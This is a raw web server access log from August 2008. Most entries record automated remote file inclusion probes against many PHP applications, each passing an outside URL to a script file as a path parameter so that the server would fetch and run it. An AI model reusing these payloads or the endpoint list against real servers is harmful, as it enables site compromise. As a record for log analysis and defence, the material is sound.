89.111.184.103 - - [07/Aug/2008:09:39:13 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:19 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:23 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:39:42 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:40:38 -0700] "GET /logs/access_080315.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:40:42 -0700] "GET //applications/frontpage.don3app/frontpage.php?app_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:40:51 -0700] "GET /logs//applications/frontpage.don3app/frontpage.php?app_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:41:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:41:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:41:45 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:41:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:41:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:42:08 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:42:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:42:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:42:58 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:42:58 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:09:43:02 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:43:02 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:09:43:02 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:43:14 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:43:14 -0700] "GET /logs/access_080214.log///?mosConfig_absolute_path=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:43:19 -0700] "GET ///?mosConfig_absolute_path=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 18473 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:43:21 -0700] "GET /logs///?mosConfig_absolute_path=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 59574 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:43:25 -0700] "GET /logs/access_080128.log%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:43:50 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:43:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:43:50 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:44:15 -0700] "GET /logs/access_071228.log///?mosConfig_absolute_path=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:44:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:45:21 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:45:22 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:45:22 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:45:23 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:09:45:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18487 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:09:45:28 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:45:33 -0700] "GET /logs/access_080311.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.22 - - [07/Aug/2008:09:45:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:45:54 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:46:06 -0700] "GET /logs/access_080227.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:46:12 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
65.55.211.22 - - [07/Aug/2008:09:46:17 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.22 - - [07/Aug/2008:09:46:17 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery HTTP/1.1" 200 53419 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
74.6.17.183 - - [07/Aug/2008:09:46:23 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:46:24 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:46:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:46:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:47:02 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:47:02 -0700] "GET /logs/access_080218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:47:03 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:47:06 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:47:06 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:47:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:18 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.55.148.240 - - [07/Aug/2008:09:47:21 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://student-x.com/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.55.148.240 - - [07/Aug/2008:09:47:21 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://student-x.com/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
65.55.211.40 - - [07/Aug/2008:09:47:26 -0700] "GET /logs/access_080330.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [07/Aug/2008:09:47:27 -0700] "GET /logs/access_080412.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:30 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:30 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:30 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:41 -0700] "GET /logs/access_080404.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:47:44 -0700] "GET /logs/access_080404.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:09:47:52 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:09:47:52 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:47:58 -0700] "GET /logs/access_080219.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:48:03 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:48:06 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:48:10 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.1.215.164 - - [07/Aug/2008:09:48:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:48:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:48:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:48:49 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.37 - - [07/Aug/2008:09:48:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:48:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:48:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
65.55.211.37 - - [07/Aug/2008:09:49:01 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 17309 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:07 -0700] "GET /logs/access_080209.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:08 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:49:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:49:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.211.37 - - [07/Aug/2008:09:49:10 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 1567 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:49:20 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:37 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:37 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:37 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:49:39 -0700] "GET /logs/access_080224.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:49:55 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:49:55 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:49:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:50:08 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:50:38 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [07/Aug/2008:09:50:38 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:50:44 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:50:45 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:50:45 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [07/Aug/2008:09:51:05 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [07/Aug/2008:09:51:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [07/Aug/2008:09:51:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [07/Aug/2008:09:51:16 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:52:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:52:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
